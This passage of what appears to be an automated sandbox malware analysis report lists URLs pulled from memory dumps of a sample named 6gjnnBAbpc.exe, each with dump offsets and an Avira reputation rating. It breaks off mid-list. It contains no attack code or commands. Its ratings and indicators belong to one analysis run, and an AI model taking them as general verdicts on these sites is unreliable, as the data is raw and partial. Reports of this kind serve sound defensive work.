                                                                                                                                                                                                                            unknown
                                                                                                                                                                                                                            http://www.item-pr.com/qK6gjnnBAbpc.exe, 00000000.00000002.668498308.0000000008D20000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                                                            unknown
                                                                                                                                                                                                                            https://www.pwd.org/6gjnnBAbpc.exe, 00000000.00000003.333008412.0000000008D55000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                                                            unknown
                                                                                                                                                                                                                            https://www.elpro.si/kategorija-izdelka/resitve-za/industrija/6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                                                            unknown
                                                                                                                                                                                                                            https://www.elpro.si/brand/handheld/6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                                                            unknown
                                                                                                                                                                                                                            https://www.elpro.si/kategorija-izdelka/razdelitev-po-standardih-direktivah/2014-34-eu/6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                                                            unknown
                                                                                                                                                                                                                            https://www.com-sit.com/wp-content/uploads/2019/01/BOX_Statement_02_BOOK-50x42.jpg6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              high
                                                                                                                                                                                                                              http://www.elpro.si/wp-content/plugins/yith-woocommerce-wishlist/assets/css/jquery.selectBox.css?ver6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                              https://www.elpro.si/kategorija-izdelka/industrijske-tablice-telefoni-handheld/industrijski-skenerji6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                              https://www.elpro.si/kategorija-izdelka/merilniki-vlage/rotronic-vlaga-aktivnost-vode-dew-point-moni6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                              https://www.aevga.com/6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314457404.0000000009ED0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.313963475.0000000008D77000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                              https://www.elpro.si/kategorija-izdelka/termometri-dataloggerji-ex/termometri/alkoholni-termometri/6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                              http://www.myropcb.com/services-capabilities/pcb-restoration/6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.438195929.000000000A1D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.329955461.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                              http://www.pcgrate.com/wp-content/plugins/pro-elements/assets/js/frontend.min.js?ver=3.3.16gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                              https://www.elpro.si/kategorija-izdelka/merilniki-tlaka/tlacni-vmesniki/6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                              http://www.myropcb.com/services-capabilities/stencil/6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.438195929.000000000A1D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.329955461.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                              http://www.valselit.com/177-appartement-a-vendre-sigean-303786gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                              https://use.fontawesome.com/releases/v5.12.0/webfonts/fa-brands-400.woff26gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 